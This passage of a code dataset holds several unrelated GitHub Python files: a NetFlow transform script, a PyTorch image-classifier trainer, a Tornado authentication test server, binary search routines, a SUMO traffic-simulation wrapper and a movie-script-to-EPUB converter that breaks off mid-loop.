sourceTransportPort = field[\"V\"]\n elif field[\"I\"] == 11:\n destinationTransportPort = field[\"V\"]\n elif field[\"I\"] == 4:\n protocolIdentifier = field[\"V\"]\n elif field[\"I\"] == 6:\n tcpControlBits = field[\"V\"]\n elif field[\"I\"] == 1:\n octetDeltaCount = field[\"V\"]\n elif field[\"I\"] in [8, 12]:\n reader = geoip2.database.Reader('GeoLite2-City.mmdb')\n ASNumber = reader.city(field[\"V\"]).country.iso_code\n elif field[\"I\"] in [8, 12]:\n asnreader = geoip2.database.Reader('GeoLite2-ASN.mmdb')\n CountryCode = asnreader.asn(field[\"V\"]).autonomous_system_number\n out = b\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" \\\n % (\n flows[\"AgentID\"],\n sourceIPAddress,\n destinationIPAddress,\n ipNextHopIPAddress,\n bgpSourceAsNumber,\n bgpDestinationAsNumber,\n protocolIdentifier,\n sourceTransportPort,\n destinationTransportPort,\n tcpControlBits,\n ingressInterface,\n egressInterface,\n octetDeltaCount,\n exported_time,\n ASNumber,\n CountryCode,\n\n )\n\n sys.stdout.write(out)\n except TypeError:\n continue","repo_name":"CavidRzayev/transform","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73887654951","text":"print('train.py is running!')\r\n\r\nimport argparse\r\nimport seaborn as sb\r\nimport torch\r\nimport numpy as np\r\nfrom torch import nn\r\nfrom torch import optim\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms, models\r\nfrom PIL import Image\r\nfrom args_train import args\r\nhyper_params = { 'data_dir': args.data_dir,\r\n 'save_dir': args.save_dir,\r\n 'arch': args.arch,\r\n 'epochs': args.epochs,\r\n 'lr': args.lr,\r\n 'gpu': args.gpu,\r\n 'in_layers': args.in_layers,\r\n 'hidden_layers': args.hidden_layers,\r\n 'out_layers': args.out_layers,\r\n 'drop': args.drop_rate,\r\n 'topk':args.topk\r\n}\r\n\r\n\r\ntrain_dir = hyper_params['data_dir'] + '/train'\r\nvalid_dir = hyper_params['data_dir'] + '/valid'\r\ntest_dir = hyper_params['data_dir'] + '/test'\r\n\r\nnormalize_dict = {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}\r\n\r\ndata_trans = {\r\n 'train': transforms.Compose([\r\n transforms.RandomRotation(30),\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(**normalize_dict)]),\r\n 'test': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(**normalize_dict)]),\r\n 'valid': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(**normalize_dict)])\r\n}\r\n\r\ndirs = {'train': train_dir,'test': test_dir,'valid': valid_dir}\r\n\r\nimages_datasets = {x: datasets.ImageFolder(dirs[x],transform = data_trans[x]) \r\n for x in list(data_trans.keys())}\r\n\r\ndata_load = {\r\n'train_load' : torch.utils.data.DataLoader(images_datasets['train'], batch_size=64, shuffle=True),\r\n'test_load' : torch.utils.data.DataLoader(images_datasets['test'], batch_size=64, shuffle=False),\r\n'valid_load' : torch.utils.data.DataLoader(images_datasets['valid'], batch_size=64, shuffle=True)\r\n}\r\n\r\nimages, labels = next(iter(data_load['test_load']))\r\nprint('test_load data: '+ str(len(images[0,2])))\r\n\r\n\r\ndef model_get(model_arch):\r\n \r\n if (model_arch == 'vgg16'):\r\n model = models.vgg16(pretrained = True)\r\n elif (model_arch == 'densenet121'):\r\n model = models.densenet121(pretrained = True)\r\n elif (model_arch == 'alexnet'):\r\n model = models.alexnet(pretrained = True)\r\n\r\n return model\r\n\r\n\r\ndef model_build(model, model_arch, drop_out):\r\n \r\n hidden_layers = args.hidden_layers\r\n ##num_categories = len(train_data.class_to_idx)\r\n num_categories = len(images_datasets['train'].class_to_idx)\r\n\r\n for param in model.parameters():\r\n param.requires_grad = False\r\n\r\n if (model_arch == 'vgg16'):\r\n from collections import OrderedDict\r\n classifier = nn.Sequential(OrderedDict([\r\n ('fc1', nn.Linear(25088, hidden_layers)),\r\n ('relu', nn.ReLU()),\r\n ('dropout', nn.Dropout(drop_out)),\r\n ('fc2', nn.Linear(hidden_layers,num_categories)),\r\n ('output', nn.LogSoftmax(dim=1)) \r\n ]))\r\n elif (model_arch == 'densenet121'):\r\n from collections import OrderedDict\r\n classifier = nn.Sequential(OrderedDict([\r\n ('fc1', nn.Linear(1024,num_categories)),\r\n ('relu', nn.ReLU()),\r\n ('dropout', nn.Dropout(drop_out)),\r\n ('output', nn.LogSoftmax(dim=1)) \r\n ]))\r\n elif (model_arch == 'alexnet'):\r\n from collections import OrderedDict\r\n classifier = nn.Sequential(OrderedDict([\r\n ('fc1', nn.Linear(9216, hidden_layers)),\r\n ('relu', nn.ReLU()),\r\n ('dropout', nn.Dropout(drop_out)),\r\n ('fc2', nn.Linear(hidden_layers,num_categories)),\r\n ('output', nn.LogSoftmax(dim=1)) \r\n ]))\r\n else:\r\n print('error')\r\n \r\n return classifier\r\n\r\n\r\nmodel = model_get(hyper_params['arch'].lower())\r\nclassifier_model = model_build(model, hyper_params['arch'].lower(), hyper_params['drop'])\r\nmodel.classifier = classifier_model\r\nprint('\\narch: ' + hyper_params['arch'] + ' classifier = ')\r\nprint(model.classifier)\r\n\r\n\r\ndef model_train(model, criterion, optimizer, epochs, train_loader, valid_loader, use_gpu):\r\n device = torch.device(\"cuda\" if use_gpu and torch.cuda.is_available() else \"cpu\")\r\n model.to(device)\r\n model.to(device)\r\n print_every = 20\r\n step = 0\r\n \r\n for epoch in range(epochs):\r\n model.train()\r\n running_loss = 0\r\n \r\n for inputs, labels in train_loader:\r\n step += 1\r\n inputs, labels = inputs.to(device), labels.to(device)\r\n \r\n optimizer.zero_grad()\r\n \r\n outputs = model(inputs)\r\n loss = criterion(outputs, labels)\r\n loss.backward()\r\n optimizer.step()\r\n \r\n running_loss += loss.item()\r\n \r\n if step % print_every == 0:\r\n model.eval()\r\n accuracy = 0\r\n valid_loss = 0\r\n \r\n with torch.no_grad():\r\n for inputs, labels in valid_loader:\r\n inputs, labels = inputs.to(device), labels.to(device)\r\n outputs = model(inputs)\r\n valid_loss += criterion(outputs, labels).item()\r\n ps = torch.exp(outputs)\r\n equality = (labels.data == ps.max(dim=1)[1])\r\n accuracy += equality.type(torch.FloatTensor).mean()\r\n\r\n print(f\"Epoch: {epoch+1}/{epochs}... \"\r\n f\"Training Loss: {running_loss/print_every:.4f}... \"\r\n f\"Validation Loss: {valid_loss/len(valid_loader):.4f}... \"\r\n f\"Validation Accuracy: {accuracy/len(valid_loader):.4f}\")\r\n \r\n running_loss = 0\r\n model.train()\r\n\r\n\r\n\r\ndef accu_check(model, test_load, gpu): \r\n right = 0\r\n total = 0\r\n \r\n model.eval()\r\n \r\n if (gpu == 'GPU'):\r\n model.to('cuda:0')\r\n \r\n with torch.no_grad():\r\n for data in test_load:\r\n images, labels = data\r\n if (gpu == 'GPU'):\r\n images, labels = images.to('cuda'), labels.to('cuda')\r\n op = model(images)\r\n _, predicted = torch.max(op.data, 1)\r\n total += labels.size(0)\r\n right += (predicted == labels).sum().item()\r\n\r\n print('\\nAccuracy: %d %%' % (100 * right / total))\r\n\r\n\r\ncriterion = nn.NLLLoss()\r\nopti = optim.Adam(model.classifier.parameters(), hyper_params['lr'])\r\nmodel_train(model, criterion, opti, hyper_params['epochs'], data_load['train_load'], data_load['valid_load'], hyper_params['gpu'])\r\naccu_check(model, data_load['test_load'], hyper_params['gpu'])\r\n\r\n\r\nmodel.class_to_idx = images_datasets['train'].class_to_idx\r\ncheckpoint = {\r\n 'arch': hyper_params['arch'],\r\n 'class_to_idx': model.class_to_idx, \r\n 'state_dict': model.state_dict(),\r\n 'opti': opti.state_dict(),\r\n 'in_layers': hyper_params['in_layers'],\r\n 'hidden_layers': hyper_params['hidden_layers'],\r\n 'out_layers': hyper_params['out_layers'],\r\n 'learning rate': hyper_params['lr'],\r\n 'dropout': hyper_params['drop'],\r\n 'epochs': hyper_params['epochs'],\r\n 'topk': hyper_params['topk']\r\n}\r\ntorch.save(checkpoint, 'checkpoint.pth')\r\n","repo_name":"Yuktha2708/Image-Classifier-Udacity","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3122376279","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''testserver.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Apr 2018\nLicense: MIT - see the LICENSE file for the full text.\n\n'''\n#############\n## LOGGING ##\n#############\n\nimport logging\n\n\n#############\n## IMPORTS ##\n#############\n\nimport os\nimport os.path\nimport signal\nimport time\nimport sys\nimport socket\nimport json\n\n# this handles async background stuff\nfrom concurrent.futures import ProcessPoolExecutor\n\n# setup signal trapping on SIGINT\ndef recv_sigint(signum, stack):\n '''\n handler function to receive and process a SIGINT\n\n '''\n raise KeyboardInterrupt\n\n\n\n#####################\n## TORNADO IMPORTS ##\n#####################\n\n# experimental, probably will remove at some point\ntry:\n import asyncio\n import uvloop\n asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n IOLOOP_SPEC = 'uvloop'\nexcept Exception as e:\n HAVE_UVLOOP = False\n IOLOOP_SPEC = 'asyncio'\n\nimport tornado.ioloop\nimport tornado.httpserver\nimport tornado.web\nimport tornado.options\nfrom tornado.options import define, options\n\n\n###############################\n### APPLICATION SETUP BELOW ###\n###############################\n\nmodpath = os.path.abspath(os.path.dirname(__file__))\n\n# define our commandline options\n\n# the port to serve on\n# testserver will serve on 12500-12519 by default\ndefine('port',\n default=12500,\n help='Run on the given port.',\n type=int)\n\n# the address to listen on\ndefine('serve',\n default='127.0.0.1',\n help='Bind to given address and serve content.',\n type=str)\n\n# whether to run in debugmode or not\ndefine('debugmode',\n default=0,\n help='start up in debug mode if set to 1.',\n type=int)\n\n# number of background threads in the pool executor\ndefine('backgroundworkers',\n default=4,\n help=('number of background workers to use '),\n type=int)\n\n# the template path\ndefine('templatepath',\n default=os.path.abspath(os.path.join(modpath,'templates')),\n help=('Sets the tornado template path.'),\n type=str)\n\n# the assetpath\ndefine('assetpath',\n default=os.path.abspath(os.path.join(modpath,'static')),\n help=('Sets the asset (server images, css, JS) path.'),\n type=str)\n\n# basedir is the directory at the root where all LCC collections are stored this\n# contains subdirs for each collection and a lcc-collections.sqlite file that\n# contains info on all collections.\ndefine('basedir',\n default=os.getcwd(),\n help=('The base directory of the light curve collections.'),\n type=str)\n\n# this overrides the light curve directories that the server uses to find\n# original format light curves.\ndefine('uselcdir',\n default=None,\n help=('This overrides the light curve directories '\n 'that the server uses to find original format '\n 'light curves when it is converting them to the '\n 'LCC CSV format'),\n type=str)\n\n## this tells the testserver about the backend checkplotservers\ndefine('cpaddr',\n default='http://127.0.0.1:5225',\n help=('This tells the lcc-server the address of a '\n 'running checkplotserver instance that might be '\n 'used to get individual object info.'),\n type=str)\n\n## this tells the testserver about the backend authnzerver\ndefine('authnzerver',\n default='http://127.0.0.1:12600',\n help=('This tells the lcc-server the address of '\n 'the local authentication and authorization server.'),\n type=str)\n\n## this tells the testserver about the default session expiry time in days\ndefine('sessionexpiry',\n default=7,\n help=('This tells the lcc-server the session-expiry time in days.'),\n type=int)\n\n\n############\n### MAIN ###\n############\n\ndef main():\n\n # parse the command line\n tornado.options.parse_command_line()\n\n DEBUG = True if options.debugmode == 1 else False\n\n # get a logger\n LOGGER = logging.getLogger(__name__)\n if DEBUG:\n LOGGER.setLevel(logging.DEBUG)\n else:\n LOGGER.setLevel(logging.INFO)\n\n ###########################\n ## DEFINING URL HANDLERS ##\n ###########################\n\n from lccserver.frontend import auth_handlers as ah\n from lccserver.authnzerver import authdb\n\n ###################\n ## SET UP CONFIG ##\n ###################\n\n MAXWORKERS = options.backgroundworkers\n\n # various directories we need\n BASEDIR = os.path.abspath(options.basedir)\n TEMPLATEPATH = os.path.abspath(options.templatepath)\n ASSETPATH = os.path.abspath(options.assetpath)\n\n # get our secret keys\n SESSIONSECRET = authdb.get_secret_token(\n 'LCC_SESSIONSECRET',\n os.path.join(\n BASEDIR,\n '.lccserver.secret'\n ),\n LOGGER\n )\n FERNETSECRET = authdb.get_secret_token(\n 'LCC_FERNETSECRET',\n os.path.join(\n BASEDIR,\n '.lccserver.secret-fernet'\n ),\n LOGGER\n )\n\n AUTHNZERVER = options.authnzerver\n SESSION_EXPIRY = options.sessionexpiry\n\n #\n # site specific info\n #\n siteinfojson = os.path.join(BASEDIR, 'site-info.json')\n with open(siteinfojson,'r') as infd:\n SITEINFO = json.load(infd)\n\n # get the email info file if it exists\n if ('email_settings_file' in SITEINFO and\n os.path.exists(os.path.abspath(SITEINFO['email_settings_file']))):\n\n with open(SITEINFO['email_settings_file'],'r') as infd:\n email_settings = json.load(infd)\n\n if email_settings['email_server'] != \"smtp.example.email.server.org\":\n SITEINFO.update(email_settings)\n\n LOGGER.info('email server to use: %s:%s' %\n (email_settings['email_server'],\n email_settings['email_port']))\n LOGGER.info('email server sender to use: %s' %\n email_settings['email_sender'])\n\n else:\n LOGGER.warning('no email server is set up')\n SITEINFO['email_server'] = None\n else:\n LOGGER.warning('no email server is set up')\n SITEINFO['email_server'] = None\n\n\n ####################################\n ## PERSISTENT BACKGROUND EXECUTOR ##\n ####################################\n\n EXECUTOR = ProcessPoolExecutor(MAXWORKERS)\n\n ##################\n ## URL HANDLERS ##\n ##################\n\n HANDLERS = [\n\n #################\n ## BASIC STUFF ##\n #################\n\n # this is the index page\n (r'/',\n ah.IndexHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the login page\n (r'/users/login',\n ah.LoginHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the logout page\n (r'/users/logout',\n ah.LogoutHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the new user page\n (r'/users/new',\n ah.NewUserHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the verification page for verifying email addresses\n (r'/users/verify',\n ah.VerifyUserHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is step 1 page for forgotten passwords\n (r'/users/forgot-password-step1',\n ah.ForgotPassStep1Handler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the verification page for verifying email addresses\n (r'/users/forgot-password-step2',\n ah.ForgotPassStep2Handler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the verification page for verifying email addresses\n (r'/users/password-change',\n ah.ChangePassHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n\n # this is an example protected page for the user containing their prefs\n (r'/users/home',\n ah.UserHomeHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n ]\n\n ########################\n ## APPLICATION SET UP ##\n ########################\n\n app = tornado.web.Application(\n static_path=ASSETPATH,\n handlers=HANDLERS,\n template_path=TEMPLATEPATH,\n static_url_prefix='/static/',\n compress_response=True,\n cookie_secret=SESSIONSECRET,\n xsrf_cookies=True,\n debug=DEBUG,\n login_url='/users/login',\n )\n\n # FIXME: consider using this instead of handlers=HANDLERS above.\n # http://www.tornadoweb.org/en/stable/guide/security.html#dns-rebinding\n # FIXME: how does this work for X-Real-Ip and X-Forwarded-Host?\n # if options.serve == '127.0.0.1':\n # app.add_handlers(r'(localhost|127\\.0\\.0\\.1)', HANDLERS)\n # else:\n # fqdn = socket.getfqdn()\n # ip = options.serve.replace('.','\\.')\n # app.add_handlers(r'({fqdn}|{ip})'.format(fqdn=fqdn,ip=ip), HANDLERS)\n\n # start up the HTTP server and our application. xheaders = True turns on\n # X-Forwarded-For support so we can see the remote IP in the logs\n http_server = tornado.httpserver.HTTPServer(app, xheaders=True)\n\n\n ######################\n ## start the server ##\n ######################\n\n # make sure the port we're going to listen on is ok\n # inspired by how Jupyter notebook does this\n portok = False\n serverport = options.port\n maxtries = 10\n thistry = 0\n while not portok and thistry < maxtries:\n try:\n http_server.listen(serverport, options.serve)\n portok = True\n except socket.error as e:\n LOGGER.warning('%s:%s is already in use, trying port %s' %\n (options.serve, serverport, serverport + 1))\n serverport = serverport + 1\n\n if not portok:\n LOGGER.error('could not find a free port after %s tries, giving up' %\n maxtries)\n sys.exit(1)\n\n LOGGER.info('Started testserver. listening on http://%s:%s' %\n (options.serve, serverport))\n LOGGER.info('Background worker processes: %s, IOLoop in use: %s' %\n (MAXWORKERS, IOLOOP_SPEC))\n LOGGER.info('The current base directory is: %s' % os.path.abspath(BASEDIR))\n\n # register the signal callbacks\n signal.signal(signal.SIGINT,recv_sigint)\n signal.signal(signal.SIGTERM,recv_sigint)\n\n # start the IOLoop and begin serving requests\n try:\n\n tornado.ioloop.IOLoop.instance().start()\n\n except KeyboardInterrupt:\n\n LOGGER.info('received Ctrl-C: shutting down...')\n tornado.ioloop.IOLoop.instance().stop()\n # close down the processpool\n\n EXECUTOR.shutdown()\n time.sleep(2)\n\n# run the server\nif __name__ == '__main__':\n main()\n","repo_name":"waqasbhatti/lcc-server","sub_path":"lccserver/frontend/testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":11855,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"70527735274","text":"\ndef binary_search(a_list, target):\n first = 0\n last = len(a_list) - 1\n found = False\n\n while first <= last and not found:\n mid = (first + last) // 2\n if a_list[mid] == target:\n found = True\n else:\n if a_list[mid] > target:\n last = mid - 1\n else:\n first = mid + 1\n return found\n\n\ndef binary_search_rec(a_list, target):\n if len(a_list) == 0:\n return False\n else:\n mid = len(a_list) // 2\n if a_list[mid] == target:\n return True\n else:\n if a_list[mid] > target:\n return binary_search_rec(a_list[:mid], target)\n else:\n return binary_search_rec(a_list[mid + 1:], target)\n\n \n\n\n\n\ntest_list = [1, 2, 32, 8, 17, 19, 42, 13, 0]\nordered_test_list = sorted(test_list)\nprint(binary_search(ordered_test_list, 3))\nprint(binary_search(ordered_test_list, 13))\n\nprint(binary_search_rec(ordered_test_list, 3))\nprint(binary_search_rec(ordered_test_list, 13))\n","repo_name":"garigari-kun/til","sub_path":"src/problem_solving/chapter5/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9384881979","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@file environ.py\n@author Allen Woods\n@date 2016-07-29\n@version 16-7-29 下午2:51 ???\nSUMO simulation environment\n\"\"\"\nimport numpy as np\nfrom collections import deque\nfrom debug.logger import timeit\n\n\nclass TrafficSim(object):\n \"\"\"\n Small wrapper for gym atari environments.\n Responsible for preprocessing screens and holding on to a screen buffer\n of size agent_history_length from which environment state\n is constructed.\n \"\"\"\n\n def __init__(self, sumo_env, cross_num=1, cross_status=4,\n agent_history_length=15, thread_label=None):\n self.env = sumo_env\n self.cross_num = cross_num\n self.cross_status = cross_status\n self.agent_history_length = agent_history_length\n self.thread_label = str(thread_label)\n self.tls_actions = sumo_env.actions # Action space is 2**tls_num\n\n # Screen buffer of size AGENT_HISTORY_LENGTH to be able\n # to build state arrays of size [1, AGENT_HISTORY_LENGTH, cross_num, cross_status]\n self.state_buffer = deque()\n self.sumo = None\n self.traci = None\n\n def reset_sumo(self):\n self.sumo =self.env.reset()\n\n def get_initial_state(self, history_length):\n \"\"\"\n Resets SUMO, clears the state buffer\n \"\"\"\n # Clear the state buffer\n self.state_buffer = deque()\n x_t, r_t, terminal, i = self.env.step(self.thread_label)\n self.cross_num = len(self.env.tls)\n self.cross_status = len(self.env.traci_env.directions)\n x_t = self.get_preprocessed_status(x_t)\n # print(x_t)\n s_t = np.stack(([x_t for i in range(history_length)]), axis=0)\n\n for i in range(self.agent_history_length - 1):\n self.state_buffer.append(x_t)\n return s_t\n\n def get_preprocessed_status(self, observation, index='halt'):\n \"\"\"\n Get Status from Traci log\n :param index:\n :param observation: list, each one contain [step, tls_id, direction,\n light_status, halting number, waiting time]\n :return: x_t, np.array, shape=(tls, directions, status);\n For example, in a 3x3 net, shape=(9, 4, 2)\n\n \"\"\"\n if index == 'halt':\n x_index = -2\n elif index == 'wait':\n x_index = -1\n else:\n raise ValueError('Index should be either \\'halt\\' or \\'wait\\'')\n x_t = np.array([x[x_index] for x in observation])\n shape = x_t.shape\n x_t = x_t.reshape((int(shape[0] / self.cross_status), self.cross_status))\n return x_t\n\n def step(self, action_index=None):\n \"\"\"\n Excecutes an action in the sumo environment.\n Builds current state (concatenation of agent_history_length-1 previous frames and current one).\n Pops oldest frame, adds current frame to the state buffer.\n Returns current state.\n \"\"\"\n if action_index == None:\n action = None\n else:\n action = self.tls_actions[action_index]\n x_t1, r_t, terminal, info = self.env.step(action)\n r_t = np.mean(r_t) # !!!!!!Using mean reward of all tls reward!!!!!\n x_t1 = self.get_preprocessed_status(x_t1)\n # print(x_t1.shape)\n s_shape = tuple([self.agent_history_length]) + x_t1.shape\n # print(s_shape)\n previous_frames = np.array(self.state_buffer)\n s_t1 = np.empty(s_shape)\n s_t1[:self.agent_history_length - 1, ...] = previous_frames\n s_t1[self.agent_history_length - 1] = x_t1\n\n # Pop the oldest frame, add the current frame to the queue\n self.state_buffer.popleft()\n self.state_buffer.append(x_t1)\n\n return s_t1, r_t, terminal, info\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"allenwoods/parasys","sub_path":"SumoEnv/environ.py","file_name":"environ.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38274876725","text":"import re\nimport subprocess\nfrom dataclasses import asdict, dataclass\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\nfrom typing import List, Optional, Union\n\nfrom bs4 import BeautifulSoup\n\nPREPROCESS_XSLT = \"\"\"\n\n\n\n \n \n \n \n \n \n\n \n

    \n \n \n \n

    \n
    \n\n
    \n\"\"\".strip()\n\nHTML_TEMPLATE = \"\"\"\n\n\n \n\n\n{}\n\n\n\"\"\".strip()\n\n\n@dataclass\nclass EPubMetadata:\n\n title: str\n authors: Optional[List[str]] = None\n pubdate: Optional[str] = None\n cover: Optional[Union[Path, str]] = None\n language: str = \"en\"\n tags: Optional[List[str]] = None\n\n book_producer: str = \"https://github.com/LennartKeller/IMSDB_EPub\"\n\n def __post_init__(self):\n if self.tags is not None:\n self.tags = [\"movie-script\"] + self.tags\n\n def to_cli_args(self) -> List[str]:\n cli_args = []\n for field, val in asdict(self).items():\n if val is None:\n continue\n if \"_\" in field:\n field = field.replace(\"_\", \"-\")\n if field == \"authors\":\n val = \"&\".join(val)\n if field == \"tags\":\n val = \", \".join(val)\n cli_args.extend([f\"--{field}\", val])\n return cli_args\n\n\nclass ConversionError(Exception):\n ...\n\n\nclass XSLTError(Exception):\n ...\n\n\ndef sanitize_html(html: str) -> str:\n # Replace spooky newlines\n html = html.strip().replace(\"\\r\", \"\")\n html = re.sub(\"\", \"\", html, flags=re.DOTALL)\n soup = BeautifulSoup(html, features=\"html5lib\")\n # Replace empty elements with br tags\n for e in soup.find_all():\n if len(e.get_text(strip=True)) == 0:\n e.replaceWith(\"
    \")\n html = soup.prettify(formatter=lambda string: string)\n return html\n\n\ndef markdown2html(text: str) -> str:\n with NamedTemporaryFile(\"w\", suffix=\".md\") as in_file:\n with NamedTemporaryFile(\"r\", suffix=\".html\") as out_file:\n in_file.write(text)\n in_file.seek(0)\n try:\n _ = subprocess.run([\n \"md-to-html\",\n \"--input\",\n in_file.name,\n \"--output\",\n out_file.name\n ],\n check=True,\n capture_output=True\n )\n except subprocess.CalledProcessError as e:\n raise ConversionError(e.stderr.decode(\"utf-8\"))\n html = out_file.read()\n return html\n\n\ndef md2html(markdown: str) -> str:\n with NamedTemporaryFile(\"w\", suffix=\".md\") as in_file:\n with NamedTemporaryFile(\"r\", suffix=\".html\") as out_file:\n in_file.write(markdown)\n in_file.seek(0)\n try:\n _ = subprocess.run([\n \"pandoc\",\n \"-i\",\n in_file.name,\n \"-o\",\n out_file.name\n ],\n check=True,\n capture_output=True\n )\n except subprocess.CalledProcessError as e:\n raise ConversionError(e.stderr.decode(\"utf-8\"))\n html = out_file.read()\n return html\n\n# def preprocess_html(html: str) -> str:\n# # Insert div to make paragraphs explicit\n# html = sanitize_html(html)\n\n# paragraphs = []\n# for p in re.split(r\"\\n{2,}\", html.strip()):\n# if not \"\".join(p.split()):\n# continue\n# if p.strip() == \"
    \" or p == \"
    \".strip():\n# paragraphs.append(p)\n\n# else:\n# paragraphs.append(f\"

    {p}

    \")\n# html = \"\\n\\n\".join(paragraphs)\n\n# # html = html.replace(\"

    \", \"\")\n#     # html = html.replace(\"
    \", \"\")\n# # html = html.replace(\"\", \"\")\n# # html = html.replace(\"\", \"\")\n# # html = html.replace(\"\", \"\")\n# # html = html.replace(\"/head>\", \"\")\n# # html = html.replace(\"\", \"\")\n# # html = html.replace(\"\", \"\")\n\n# # try:\n# # transform = et.XSLT(et.parse(BytesIO(PREPROCESS_XSLT.encode(\"utf-8\"))))\n# # tree = et.parse(StringIO(html), parser=et.HTMLParser(recover=True))\n# # transformed_tree = transform(tree)\n# # html = et.tostring(transformed_tree).decode(\"utf-8\")\n# # except Exception as e:\n# # raise XSLTError(e)\n# # html = markdown2html(html)\n# return html\n\n\ndef preprocess_html(html: str) -> str:\n html = re.sub(\"\", \"\", html, flags=re.DOTALL)\n html = sanitize_html(html)\n paragraphs = []\n for p in re.split(r\"\\n{2,}\", html.strip()):\n if not \"\".join(p.split()):\n continue\n if p.strip() == \"
    \" or p == \"
    \".strip():\n paragraphs.append(p)\n\n else:\n paragraphs.append(f\"

    {p}

    \")\n\n html = \"\\n\\n\".join(paragraphs)\n\n # Remove tags\n html = html.replace(\"\\n\", \"
    \")\n html = html.replace(\"
    \", \"\")\n    html = html.replace(\"
    \", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"/head>\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n # Insert content into standardized template\n html = HTML_TEMPLATE.format(html)\n return html\n\n\ndef convert(html: str, out_file: Union[str, Path], metadata: Optional[EPubMetadata] = None) -> None:\n out_file = Path(out_file)\n if out_file.suffix != \".epub\":\n out_file.rename(out_file.with_suffix(\".epub\"))\n\n with NamedTemporaryFile(\"w\", suffix=\".html\") as src_file:\n src_file.write(html)\n src_file.seek(0)\n try:\n args = [\n \"ebook-convert\",\n src_file.name,\n out_file.absolute()\n ]\n if metadata is not None:\n metadata_args = metadata.to_cli_args()\n args += metadata_args\n _ = subprocess.run(\n args=args,\n check=True,\n capture_output=True\n )\n except subprocess.CalledProcessError as e:\n raise ConversionError(e.stderr.decode(\"utf-8\"))\n\n\nif __name__ == \"__main__\":\n import json\n import logging\n\n from tqdm.auto import tqdm\n logger = logging.getLogger()\n\n POSTER_DIR = Path(\"poster\")\n\n EPUB_DIR = Path(\"epub\")\n EPUB_DIR.mkdir(exist_ok=True)\n\n HTML_DIR = Path(\"html\")\n HTML_DIR.mkdir(exist_ok=True)\n\n data = [\n json.loads(line)\n for line in Path(\"data_html.jsonl\").read_text().split(\"\\n\")\n if line.strip()\n ]\n pbar = tqdm(list(sorted(data, key=lambda s: s.get(\"title\"))))\n\n if POSTER_DIR.exists():\n poster_files = list(POSTER_DIR.glob(\"*.jpg\"))\n\n def find_poster(title: str) -> str:\n title = \"_\".join(title.split())\n for file in poster_files:\n if file.stem == title:\n return file.absolute()\n\n for script in pbar:\n title = \" \".join(script[\"title\"].split())\n html = script[\"script\"]\n\n if POSTER_DIR.exists():\n poster_file = find_poster(title)\n\n metadata = EPubMetadata(\n title=title,\n authors=script.get(\"writers\"),\n pubdate=script.get(\"script_date\"),\n cover=poster_file,\n tags=script.get(\"genres\")\n )\n\n (HTML_DIR / f\"BEFORE_{title}.html\").write_text(html)\n pbar.set_description(f\"Processing {title}\")\n try:\n preprocessed_html = preprocess_html(html=html)\n 